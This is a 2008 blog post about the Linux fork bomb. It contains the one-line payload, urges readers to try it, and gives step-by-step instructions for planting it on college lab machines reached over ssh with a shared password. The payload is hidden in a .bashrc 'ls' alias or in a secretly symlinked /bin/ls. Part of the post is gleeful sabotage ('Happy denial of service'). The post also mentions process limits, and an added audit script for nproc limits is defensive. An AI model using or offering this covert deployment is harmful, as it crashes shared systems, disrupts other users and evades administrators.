August 10, 2008

fork bomb deployment

I have been telling my friends about this over the last few weeks; now I am gonna post it here.
It's the fork bomb. For now I will deal only with the Linux one...

vivek@vivek-desktop:~$ :(){ :|:& };:

What happens after this? Please do try it out at home. Then read beyond this...

It is a fork bomb. When a process forks, a child process is created. Here we define a function ':' which calls itself and pipes its output into another call of itself, thereby recursing, and which also goes to the background. Once you type this and press Enter, you can't help it... you will have to reboot the system manually.



What happens is that the endlessly multiplying forked processes flood the process table and bring the system down. This is an ideal DoS attack.

Here I would like to go beyond just introducing this concept... I have thought about unleashing it.

My ideas are based on our college lab setup. It works in our CC1. There, all systems are accessible via ssh and the password of the 'mec' user is known.

1) ssh to the system of choice as a user (no need for root)
2) Either run it on the terminal for instant gratification, or maybe as in step 3
3) nano .bashrc
4) Add a line at the end: alias ls=':(){ :|:& };:'
5) Save and exit

Note: it takes effect when a new terminal is opened.
As ls is a common command, you get to see your devilish action at work many times, maybe until the system administrator finds it and fixes it.

This is quite likely to be discovered by anyone wise enough to open up .bashrc and check it.
Another method I propose is to replace /bin/ls with a soft link to a script of yours (hidden and in an unusual place, preferably) which contains the fork bomb. This is tougher to trace, but needs either root access or a user with sudoer power, e.g. the graphics user in our lab.

Ah... now that we have had enough fun crashing systems, let's think about how this can be stopped so that no one plays this on you, or if you are the system admin (see, I care for them, I am a good guy). This can be stopped by editing the /etc/limits.conf file, which specifies the number of processes (among other resources) that each user on the system can have open at a time. If you keep it at a decent value (by default it is unlimited), fork bombs won't explode... voila... hehe
So you see, the moral of the story is that ignorance is the biggest security hole in any system. You can always avoid or prevent such attacks by doing the right thing at the right time...
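
An added example (not part of the original post): a small shell check that reads a limits.conf-style file and reports the hard nproc limit a given user ends up with, so an admin can see which accounts are still exposed. It assumes the pam_limits line format `<domain> <type> <item> <value>` (on PAM systems the file is /etc/security/limits.conf); the sample policy and the function names are constructed for illustration.

```shell
#!/bin/sh
# Added example: audit the per-user process limit that stops a fork bomb.

# Constructed sample policy, not taken from any real system.
sample_limits() {
cat <<'EOF'
# <domain> <type> <item> <value>
*        soft   nproc  200
*        hard   nproc  300
mec      hard   nproc  100
root     hard   nproc  unlimited
EOF
}

# nproc_hard_limit USER [FILE]: print the hard nproc value that applies to USER.
# Reads FILE, or stdin when FILE is omitted. A line naming the user wins over
# the "*" default; @group lines are ignored to keep the example short.
# Prints "unset" when no line applies.
nproc_hard_limit() {
    user=$1
    file=${2:--}
    awk -v user="$user" '
        NF < 4 || $1 ~ /^#/        { next }   # blanks, comments, short lines
        $3 != "nproc"              { next }
        $2 != "hard" && $2 != "-"  { next }   # "-" sets both soft and hard
        $1 == user { exact = $4 }             # last matching line is kept
        $1 == "*"  { wild  = $4 }
        END {
            if (exact != "")     print exact
            else if (wild != "") print wild
            else                 print "unset"
        }' "$file"
}

# fork_bomb_exposed USER [FILE]: succeeds (exit 0) when USER has no finite
# hard nproc limit, i.e. a fork bomb run as USER is not capped by this file.
fork_bomb_exposed() {
    limit=$(nproc_hard_limit "$@")
    case $limit in
        unset|unlimited|infinity|-1) return 0 ;;
        *) return 1 ;;
    esac
}

sample_limits | nproc_hard_limit mec   # prints 100
```

Run it against the real file with `nproc_hard_limit someuser /etc/security/limits.conf`, and compare the result with `ulimit -u` in a fresh login session for that user.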

Happy denial of service... ;)

And ya, let me add what happened when I used its counterpart in Windows: it spawned DOS windows, one after another, but I was able to shut down properly using Task Manager, unlike Linux, which completely died the moment after you entered this... hehe... bad news for Linux fans. :D
